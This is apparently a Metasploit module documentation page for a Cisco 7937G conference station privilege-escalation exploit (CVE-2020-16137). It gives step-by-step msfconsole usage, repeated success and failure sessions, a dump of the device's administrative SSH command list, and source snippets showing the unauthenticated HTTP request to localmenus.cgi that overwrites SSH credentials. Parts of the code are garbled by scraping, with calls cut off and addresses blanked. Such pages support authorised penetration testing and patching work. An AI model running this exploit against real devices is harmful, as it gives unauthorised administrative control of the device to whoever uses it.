Cisco 7937G SSH Privilege Escalation - Metasploit

This page contains detailed information about how to use the auxiliary/admin/http/cisco_7937g_ssh_privesc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

Name: Cisco 7937G SSH Privilege Escalation
Module: auxiliary/admin/http/cisco_7937g_ssh_privesc
Source code: modules/auxiliary/admin/http/
Disclosure date: 2020-06-02
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-16137

This module exploits a feature that should not be available via the web interface. An unauthenticated user may change the credentials for SSH access to any username and password combination desired, giving access to administrative functions through an SSH connection.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/admin/http/cisco_7937g_ssh_privesc
msf auxiliary(cisco_7937g_ssh_privesc) > show options
    ... show and set options ...
msf auxiliary(cisco_7937g_ssh_privesc) > set RHOSTS ip-range
msf auxiliary(cisco_7937g_ssh_privesc) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(cisco_7937g_ssh_privesc) > set RHOSTS 

Example 2:

msf auxiliary(cisco_7937g_ssh_privesc) > set RHOSTS

Example 3:

msf auxiliary(cisco_7937g_ssh_privesc) > set RHOSTS file:/tmp/ip_list.txt

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base

Vulnerable Application

Cisco 7937G Conference Station. This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.


This module exploits a feature that should not be available via the web interface. An unauthenticated user may set the credentials for SSH access to any username and password combination desired, giving access to administrative functions through an SSH connection.

Verification Steps

  1. Obtain a Cisco 7937G Conference Station.
  2. Enable Web Access and SSH Access on the device.
  3. Start msfconsole
  4. Do: use auxiliary/admin/http/cisco_7937g_ssh_privesc
  5. Do: set RHOSTS
  6. Do: set USER test
  7. Do: set PASS test
  8. Do: run
  9. The conference station's SSH service should now be configured with the supplied USER:PASS.



The desired password for setting SSH access


The desired username for setting SSH access


Cisco 7937G Running Firmware Version SCCP-1-4-5-7

Successful Scenario

msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts
rhosts =>
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run

[*] Running for
[*] - Attempting to set SSH credentials.
[*] - SSH attack finished!
[*] - Try to login using the supplied credentials test:test
[*] - You must specify the key exchange when connecting or the device will be DoS'd!
[*] - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
[email protected]'s password:


Commands 1 to 21:
help - Shows basic help for all commands.
echo - Echoes all arguments (arbitrary parameters, up to 9)
psosMaxShow - Show max number of psos objects created.
psosFailuresShow - Show failures of psos api calls.
clearNetStats - Clear statistics counters in Ethernet Driver.
nicheShow - Show statistics of InterNiche stack.
psosIntStackShow - Show information on interrupt stack.
i - Display status of the specified process, or all running processes (Process_name (optional))
checkStack - Checks the stack.
reboot - Reboots the phone with an optional parameter.
logl - Set the lowest log level which will be displayed (0-6)
logs - Set the log level output for a given module ([module] [0-6])
logsa - Set the log level output for all modules. ([0-6])
logt - Set the log display type (0-2)
logd - Dump the log, parameter is reverse order or not.
logda - Print all available log modules and their current level.
setRtRender - Set real time rendering parameters for the log.
lfu - Send the logfiles to the provisioning server(no parameters).
del - Delete specified file.
cat - Concatanate specified files.

Commands 21 to 41:
copy - Copy a file, can be stdout.
ls - List the contents of flash.
ll - List the contents of flash.
d - Display memory.  
,, m - Display memory.
, ping - Ping a given host (IP or DNS name) [,Data Len in Bytes] ifShow - Display ethernet interface statistics (no parameters) showStoredConfig - Display configuration as stored in flash (no parameters) showRunningConfig - Display the current running configuration (no parameters) showBackupConfig - Display backup configuration as stored in flash (no parameters) overrideBackupConfig - Override backup flash config with current config (no parameters) overrideSecurityBackup - Override backup security sector with current security sector. resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline]) configDhcpSet - Set DHCP parameters in the flash. (DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type, Using statically configured boot server[YES|NO]) configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain) configNetSet - Set network parameters in the flash. (IP Address, Subnet Mask, Router, VLAN(can be empty)) configProvisioningSet - Set provisioning server parameters in the flash. (Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password) configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset) nslookup - Find the IP for a given hostname dnsCacheAShow - Show DNS Cache for A records. Commands 41 to 61: dnsCacheSrvShow - Show DNS Cache for SRV records. dnsCacheAFlush - Flush DNS A records from cache. version - Display vxWorks bootline, software versions, and hardware version. hwBoardSerialSet - Set serial number. !!!!!Should never be used!!!!!. hwVarSet - Set the contents of a hardware var ([var ID] [new value]) hwVarShow - Display the contents of a hardware var ([var ID]) simulateKeyPress - Send a key Press event to so like it came from hardware. simulateKeyHold - Send a key Hold event to so like it came from hardware. simulateKeyRelease - Send a key Release event to so like it came from hardware. simulateHookUp - Send a hookswitch event to so like it came from hardware. simulateHookDown - Send a hookswitch event to so like it came from hardware. ncasMisc - Show misc. non-call information (no parameters) ncasCb - Show detailed ncas information, related to either call services, non-call services, or server information (1, 2, or 3) uptime - Show phone uptime. appPrt - Show UI's call status. fntPrt - Show information about fonts available on phone. memtop - Shows the top poiter to current memory. removeScheduledLogEntry - debug addScheduledLogEntry - debug fatalError - Simulate fatal error for the phone. Commands 61 to 81: enableStrTruncLog - Enable logging of string truncation. disableStrTruncLog - Disable logging of string truncation. sendFlashBinImage - Upload binary flash image. setMac - debug, here because PSOS can't set the MAC. sg - send a bitmap to the boot server memShow - Display system memory usage memDebug - Toggle memory manager trace flag l2Debug - Toggle memory manager trace flag wsTest - Web Service Test Tool fxShow - Display file transfer manager status utilHostByNameShow - Test utilHostByName utilDnsShow - Show callbacks for dns queries dnsCacheShow - Show DNSACacheShow utilEthLinkShow - Show Ethernet link status ethConfigTest - Set Ethernet Mode (0 to 4) timeTest - Test time contrastChg - Change LCD Contrast setAdminVlan - Set admin vlan id setL2Auth - Set L2 Auth Enable/Disable ipAddrChange - Change ip addr configuration Commands 81 to 101: tftpChange - Change tftp addr arpStats - Print ARP statistics fxPut - Transfer file to remote crash - Crash the system ipAddrShow - Show ip addr rtosSocketShow - Show rtos socket information sccpShow - Show protocol regManagerShow - show registration manager state uiPrintAll - uiPrintAll uiPrintSoftKeys - uiPrintSoftKeys getVoiceQuality - displays voice quality control status uiPrintLocalSoftKeys - uiPrintLocalSoftKeys uiStartTone - uiStartTone uiStopTone - uiStopTone pegPrintAll - pegPrintAll uiSMPrintAll - uiStateMachinePrintAll lldpSMPrintAll - lldpStateMachinePrintAll saveLogLevels - saveLogLevels localePrintAll - localePrintAll ceShow - Show Client Engine Status Commands 101 to 121: udiShow - Show Unique Device Indentifier show - Show Unique Device Indentifier pbnShow - Display app & bootrom headers upr - Upgrade to a Rockpile Standalone Image upm - Upgrade to a Rockpile Manf Image setHw - Sets the Rockpile Hardware Id getHw - Prints the Rockpile Hardware Id setUpf - Sets the Upgrade progress flag rstUpf - Resets the Upgrade progress flag setMdm - Sets the Manf diag mode flag rstMdm - Resets the Manf diag mode flag setDhcp - Sets the Manf diag dhcp flag rstDhcp - Resets the Manf diag dhcp flag setOrd - Sets the ORD flag rstOrd - Resets the ORD flag fs - Prin the status of rockpile flags cp - Mfg. test diags vol - Mfg. test diags sig - Mfg. test diags os - Mfg. test diags Commands 121 to 141: lcd - Mfg. test diags sum - Prints checksums of flash images rd - Mfg. test diags wr - Mfg. test diags eth - Start/stop ethernet hardware fstp - Stop FGPIO interface hfTxEq - Audio testing for large conf rooms ctConv - perform ct convergence test. ctModeEnd - terminate ctMode ctEnableRx - Enable ctRx 1 on, 0 off ctEnableTx - Enable ctTx 1 on, 0 off ctMicTx - Route mic # to Tx ctEMTx - Route external mic # to Tx ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm) ctRxSpkr - Send directly to HF speaker ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm) ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm) displayListeningPorts - Display listening port and process info killListeningProcess - Kill the task associated with the port $>exit

Unsuccessful Scenario

msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts
rhosts =>
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run

[*] Running for
[*] - Attempting to set SSH credentials.
[-] - Device doesn't appear to be functioning or web access is not enabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Cisco 7937G Running Firmware Version SCCP-1-4-5-5

Successful Scenario

msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts
rhosts =>
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run

[*] Running for
[*] - Attempting to set SSH credentials.
[*] - SSH attack finished!
[*] - Try to login using the supplied credentials test:test
[*] - You must specify the key exchange when connecting or the device will be DoS'd!
[*] - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]
[email protected]'s password:


Commands 1 to 21:
help - Shows basic help for all commands.
echo - Echoes all arguments (arbitrary parameters, up to 9)
psosMaxShow - Show max number of psos objects created.
psosFailuresShow - Show failures of psos api calls.
clearNetStats - Clear statistics counters in Ethernet Driver.
nicheShow - Show statistics of InterNiche stack.
psosIntStackShow - Show information on interrupt stack.
i - Display status of the specified process, or all running processes (Process_name (optional))
checkStack - Checks the stack.
reboot - Reboots the phone with an optional parameter.
logl - Set the lowest log level which will be displayed (0-6)
logs - Set the log level output for a given module ([module] [0-6])
logsa - Set the log level output for all modules. ([0-6])
logt - Set the log display type (0-2)
logd - Dump the log, parameter is reverse order or not.
logda - Print all available log modules and their current level.
setRtRender - Set real time rendering parameters for the log.
lfu - Send the logfiles to the provisioning server(no parameters).
del - Delete specified file.
cat - Concatanate specified files.

Commands 21 to 41:
copy - Copy a file, can be stdout.
ls - List the contents of flash.
ll - List the contents of flash.
d - Display memory.  
,, m - Display memory.
, ping - Ping a given host (IP or DNS name) [,Data Len in Bytes] ifShow - Display ethernet interface statistics (no parameters) showStoredConfig - Display configuration as stored in flash (no parameters) showRunningConfig - Display the current running configuration (no parameters) showBackupConfig - Display backup configuration as stored in flash (no parameters) overrideBackupConfig - Override backup flash config with current config (no parameters) overrideSecurityBackup - Override backup security sector with current security sector. resetConfig - Reset the phone to the default settings(setting type [SPIP],[SPIPCS],[SPIPShoreline]) configDhcpSet - Set DHCP parameters in the flash. (DHCP Enabled[YES|NO], Offer Timeout, DHCP Option, DHCP Option Type, Using statically configured boot server[YES|NO]) configDnsSet - Set DNS parameters in the flash. (Primary DNS Server, Secondary DNS Server, DNS Domain) configNetSet - Set network parameters in the flash. (IP Address, Subnet Mask, Router, VLAN(can be empty)) configProvisioningSet - Set provisioning server parameters in the flash. (Server Name, Using server type[FTP|TFTP|HTTP|HTTPS|FTPS], User, Password) configSntpSet - Set SNTP parameters in the flash. (sntpserverName,sntpgmtOffset) nslookup - Find the IP for a given hostname dnsCacheAShow - Show DNS Cache for A records. Commands 41 to 61: dnsCacheSrvShow - Show DNS Cache for SRV records. dnsCacheAFlush - Flush DNS A records from cache. version - Display vxWorks bootline, software versions, and hardware version. hwBoardSerialSet - Set serial number. !!!!!Should never be used!!!!!. hwVarSet - Set the contents of a hardware var ([var ID] [new value]) hwVarShow - Display the contents of a hardware var ([var ID]) simulateKeyPress - Send a key Press event to so like it came from hardware. simulateKeyHold - Send a key Hold event to so like it came from hardware. simulateKeyRelease - Send a key Release event to so like it came from hardware. simulateHookUp - Send a hookswitch event to so like it came from hardware. simulateHookDown - Send a hookswitch event to so like it came from hardware. ncasMisc - Show misc. non-call information (no parameters) ncasCb - Show detailed ncas information, related to either call services, non-call services, or server information (1, 2, or 3) uptime - Show phone uptime. appPrt - Show UI's call status. fntPrt - Show information about fonts available on phone. memtop - Shows the top poiter to current memory. removeScheduledLogEntry - debug addScheduledLogEntry - debug fatalError - Simulate fatal error for the phone. Commands 61 to 81: enableStrTruncLog - Enable logging of string truncation. disableStrTruncLog - Disable logging of string truncation. sendFlashBinImage - Upload binary flash image. setMac - debug, here because PSOS can't set the MAC. sg - send a bitmap to the boot server memShow - Display system memory usage memDebug - Toggle memory manager trace flag l2Debug - Toggle memory manager trace flag wsTest - Web Service Test Tool fxShow - Display file transfer manager status utilHostByNameShow - Test utilHostByName utilDnsShow - Show callbacks for dns queries dnsCacheShow - Show DNSACacheShow utilEthLinkShow - Show Ethernet link status ethConfigTest - Set Ethernet Mode (0 to 4) timeTest - Test time contrastChg - Change LCD Contrast setAdminVlan - Set admin vlan id setL2Auth - Set L2 Auth Enable/Disable ipAddrChange - Change ip addr configuration Commands 81 to 101: tftpChange - Change tftp addr arpStats - Print ARP statistics fxPut - Transfer file to remote crash - Crash the system ipAddrShow - Show ip addr rtosSocketShow - Show rtos socket information sccpShow - Show protocol regManagerShow - show registration manager state uiPrintAll - uiPrintAll uiPrintSoftKeys - uiPrintSoftKeys getVoiceQuality - displays voice quality control status uiPrintLocalSoftKeys - uiPrintLocalSoftKeys uiStartTone - uiStartTone uiStopTone - uiStopTone pegPrintAll - pegPrintAll uiSMPrintAll - uiStateMachinePrintAll lldpSMPrintAll - lldpStateMachinePrintAll saveLogLevels - saveLogLevels localePrintAll - localePrintAll ceShow - Show Client Engine Status Commands 101 to 121: udiShow - Show Unique Device Indentifier show - Show Unique Device Indentifier pbnShow - Display app & bootrom headers upr - Upgrade to a Rockpile Standalone Image upm - Upgrade to a Rockpile Manf Image setHw - Sets the Rockpile Hardware Id getHw - Prints the Rockpile Hardware Id setUpf - Sets the Upgrade progress flag rstUpf - Resets the Upgrade progress flag setMdm - Sets the Manf diag mode flag rstMdm - Resets the Manf diag mode flag setDhcp - Sets the Manf diag dhcp flag rstDhcp - Resets the Manf diag dhcp flag setOrd - Sets the ORD flag rstOrd - Resets the ORD flag fs - Prin the status of rockpile flags cp - Mfg. test diags vol - Mfg. test diags sig - Mfg. test diags os - Mfg. test diags Commands 121 to 141: lcd - Mfg. test diags sum - Prints checksums of flash images rd - Mfg. test diags wr - Mfg. test diags eth - Start/stop ethernet hardware fstp - Stop FGPIO interface hfTxEq - Audio testing for large conf rooms ctConv - perform ct convergence test. ctModeEnd - terminate ctMode ctEnableRx - Enable ctRx 1 on, 0 off ctEnableTx - Enable ctTx 1 on, 0 off ctMicTx - Route mic # to Tx ctEMTx - Route external mic # to Tx ctSineTx - [chan], [freq], [dBm]: Generate tone to Tx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm) ctRxSpkr - Send directly to HF speaker ctSineSpkr - [chan], [freq], [dBm]: Generate tone to Rx (0 => HD, 1 => HF, default HF, 1KHz, -40dBm) ctNoiseSpkr - [chan], [dBm]: Generate noise to Rx (0 => HD, 1 => HF, default HF, -40dBm) displayListeningPorts - Display listening port and process info killListeningProcess - Kill the task associated with the port $>exit

Unsuccessful Scenario

msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
user => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
pass => test
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts
rhosts =>
msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run

[*] Running for
[*] - Attempting to set SSH credentials.
[-] - Device doesn't appear to be functioning or web access is not enabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage

Here is how the admin/http/cisco_7937g_ssh_privesc auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/http/cisco_7937g_ssh_privesc

msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show info

       Name: Cisco 7937G SSH Privilege Escalation
     Module: auxiliary/admin/http/cisco_7937g_ssh_privesc
    License: GNU Public License v2.0
       Rank: Normal
  Disclosed: 2020-06-02

Provided by:
  Cody Martin

Check supported:

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PASS                      yes       Desired password
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  THREADS  1                yes       The number of concurrent threads (max one per host)
  TIMEOUT  5                yes       Timeout in seconds
  USER                      yes       Desired username

  This module exploits a feature that should not be available via the 
  web interface. An unauthenticated user may change the credentials 
  for SSH access to any username and password combination desired, 
  giving access to administrative functions through an SSH connection.


Module Options

This is a complete list of options available in the admin/http/cisco_7937g_ssh_privesc auxiliary module:

msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show options

Module options (auxiliary/admin/http/cisco_7937g_ssh_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   PASS                      yes       Desired password
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS  1                yes       The number of concurrent threads (max one per host)
   TIMEOUT  5                yes       Timeout in seconds
   USER                      yes       Desired username

Advanced Options

Here is a complete list of advanced options supported by the admin/http/cisco_7937g_ssh_privesc auxiliary module:

msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show advanced

Module advanced options (auxiliary/admin/http/cisco_7937g_ssh_privesc):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   ShowProgress         true             yes       Display progress messages during a scan
   ShowProgressPercent  10               yes       The interval in percent that progress should be shown
   VERBOSE              false            no        Enable detailed status messages
   WORKSPACE                             no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the admin/http/cisco_7937g_ssh_privesc module can do:

msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the admin/http/cisco_7937g_ssh_privesc auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/http/cisco_7937g_ssh_privesc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Python module dependency (requests) is missing, cannot continue

Here is a relevant code snippet related to the "Python module dependency (requests) is missing, cannot continue" error message:

60:	def run(args):
61:	    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
62:	    if dependency_missing:
63:	        logging.error('Python module dependency (requests) is missing, cannot continue')
64:	        logging.error('Please execute pip3 install requests.')
65:	        return
67:	    url = "http://{}/localmenus.cgi".format(args['rhost'])
68:	    payload_user = {"func": "403", "set": "401",

Please execute pip3 install requests.

Here is a relevant code snippet related to the "Please execute pip3 install requests." error message:

60:	def run(args):
61:	    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
62:	    if dependency_missing:
63:	        logging.error('Python module dependency (requests) is missing, cannot continue')
64:	        logging.error('Please execute pip3 install requests.')
65:	        return
67:	    url = "http://{}/localmenus.cgi".format(args['rhost'])
68:	    payload_user = {"func": "403", "set": "401",
69:	                    "name1": args['USER'], "name2": args['USER']}

Device doesn't appear to be functioning or web access is not enabled.

Here is a relevant code snippet related to the "Device doesn't appear to be functioning or web access is not enabled." error message:

72:"Attempting to set SSH credentials.")
73:	    try:
74:	        r =, params=payload_user,
75:	                          timeout=int(args['TIMEOUT']))
76:	        if r.status_code != 200:
77:	            logging.error("Device doesn't appear to be functioning or web access is not enabled.")
78:	            return
80:	        r =, params=payload_pass, timeout=int(args['TIMEOUT']))
81:	        if r.status_code != 200:
82:	            logging.error("Device doesn't appear to be functioning or web access is not enabled.")

Device doesn't appear to be functioning or web access is not enabled.

Here is a relevant code snippet related to the "Device doesn't appear to be functioning or web access is not enabled." error message:

77:	            logging.error("Device doesn't appear to be functioning or web access is not enabled.")
78:	            return
80:	        r =, params=payload_pass, timeout=int(args['TIMEOUT']))
81:	        if r.status_code != 200:
82:	            logging.error("Device doesn't appear to be functioning or web access is not enabled.")
83:	            return
84:	    except requests.exceptions.RequestException:
85:	        logging.error("Device doesn't appear to be functioning or web access is not enabled.")
86:	        return

Device doesn't appear to be functioning or web access is not enabled.

Here is a relevant code snippet related to the "Device doesn't appear to be functioning or web access is not enabled." error message:

80:	        r =, params=payload_pass, timeout=int(args['TIMEOUT']))
81:	        if r.status_code != 200:
82:	            logging.error("Device doesn't appear to be functioning or web access is not enabled.")
83:	            return
84:	    except requests.exceptions.RequestException:
85:	        logging.error("Device doesn't appear to be functioning or web access is not enabled.")
86:	        return
88:"SSH attack finished!")
89:"Try to login using the supplied credentials {}:{}").format(
90:	        args['USER'], args['PASS']))

Go back to menu.


See Also

Check also the following modules related to this module:


  • Cody Martin


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.